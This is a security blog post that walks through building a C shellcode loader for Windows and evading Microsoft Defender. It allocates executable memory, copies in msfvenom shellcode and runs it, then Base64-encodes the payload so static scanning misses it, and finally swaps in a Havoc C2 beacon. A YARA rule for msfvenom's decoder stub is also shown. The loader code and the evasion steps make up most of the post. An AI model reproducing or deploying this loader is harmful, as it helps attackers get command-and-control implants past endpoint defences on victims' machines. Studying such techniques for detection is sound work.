Slipping through defender with a simple shellcode loader

This blog is for educational purposes only. The content provided is intended to share knowledge and insights related to cybersecurity.

Shellcode loader?

A shellcode loader is a program designed to execute shellcode within a local or remote process. all shellcode loaders share the same steps when it come to loading a shellcode:

1. Memory Allocation – This is done using functions like KERNEL32!VirtualAlloc(Ex) or NTDLL!NtAllocateVirtualMemory(Ex). .
2. Copy Shellcode – The shellcode is then copied into the allocated memory region.
3. Execute Shellcode – Running the shellcode using KERNEL32!CreateThread(Ex), NTDLL!NtCreateThread(Ex) NTDLL!RtlCreateUserThread, or executing it directly by casting it to a function pointer (void(*)()).

Why you need one?

The cool thing about having a shellcode loader is that you can add techniques for evasion like stack spoofing (hook windows api used by the beacon and spoof its stack), sleep obfuscation (hook sleep api used by the beacon and encrypt process stack/heap before sleep), anti-static/dynamic/sandbox, etc. i’ll cover these techniques in later posts. The main purpose, though, is just to load and execute the shellcode.

let’s cook!

Simple shellcode loader

let’s start by writing a simple shellcode loader.

#include <windows.h>

// msfvenom -p windows/x64/exec cmd=calc -f c
unsigned char buf[ ] = "\xfc\x48\x83\xe4\xf0...";

int main( ) {

    
    PVOID pMemory = VirtualAlloc(  NULL, 
                                   sizeof( buf ), 
                                   MEM_COMMIT, 
                                   PAGE_EXECUTE_READWRITE );

    memcpy( pMemory, buf, sizeof( buf ) );

    (( int( * )( ) )pMemory)( );

    return ( 0 );
}

Compiling and dropping the file triggers defender. that means we got detect just in the static analysis phase.

How did we get detected?

AV/EDR software use static analysis to identify malicious applications without executing them. One of the primary techniques used in this process is pattern scanning, where the AV/EDR scans files for specific byte sequences for example pattern associated with a known malware family or decryption/encryption loop, etc.

A well-known tool for this purpose is YARA, a pattern-scanning tool that allows users to define custom rules for detecting malicious files and processes.

I just made a rule to detect the decryption stage of the previous generated shellcode with msfvenom:

rule msfvenom_shellcode_decoding
{
    meta:
        author = "0xPrimo"
        desc   = "Decryption stage of generated metasploit shellcode"

    strings:
        /*
            0000002d  48                 dec     eax
            0000002e  31c0               xor     eax, eax  {0x0}
            00000030  ac                 lodsb   byte [esi]  {0x0}
            00000031  3c61               cmp     al, 0x61
            00000033  7c02               jl      0x37
        */
        $a   = { 48 31 c0 ac 3c ?? }
        
        /*
            00000035  2c20               sub     al, 0x20
            00000037  41                 inc     ecx
            00000038  c1c90d             ror     ecx, 0xd
            0000003b  41                 inc     ecx
            0000003c  01c1               add     ecx, eax
            0000003e  e2ed               loop    0x2d
        */
        $b   = { 2c ?? 41 c1 c9 ?? 41 01 c1 e2 ed }

    condition:
        all of them
}

After scanning the project directory we can see that YARA found files that match the rule we just created.

How can we bypass this detection?

as i said before the power of having a shellcode loader is you can customize it as you want and add evasion techniques to it to bypass these detections.

One technique used to bypass static analysis is payload encoding. We simply encode our payload to Base64 and then implement a function to decode it during execution. This way, when the scanner scans our file on the disk, it will only see Base64 string and not the shellcode.

i just implemented this function to help me decode the payload at runtime.

BOOL Base64Decode( LPCSTR Input, PBYTE* Output, SIZE_T* OutLen );

our shellcode loader now will look like this.

// msfvenom -p windows/x64/exec CMD=calc.exe -f base64
char buf_b64[] = "/EiD5PDowAAA..."

int main( ) {

    PBYTE	pShellcode = NULL;
    SIZE_T	sShellcode = 0;

    Base64Decode( buf_b64, &pShellcode, &sShellcode );

    PVOID pMemory = VirtualAlloc( NULL, 
                                  sShellcode, 
                                  MEM_COMMIT, 
                                  PAGE_EXECUTE_READWRITE );

    memcpy( pMemory, pShellcode, sShellcode );

    (( int( * )( ) )pMemory)( );

    return ( 0 );
}

and as you can see defender thinks we’re okay.

let’s replace msfvenom shellcode with havoc demon shellcode.

PoC source code can be found here

Conclusion

To conclude, we’ve covered what a shellcode loader is and its purpose. We also used a simple trick to bypass static analysis. It’s important to note that a memory scanner will most likely detect our shellcode as they will find it not encoded, but there are ways to bypass this, which we’ll cover in later posts. Thanks for reading, and have a great day!

References

• https://gatari.dev/posts/memory-lane/
• https://github.com/kyleavery/AceLdr
• https://github.com/boku7/BokuLoader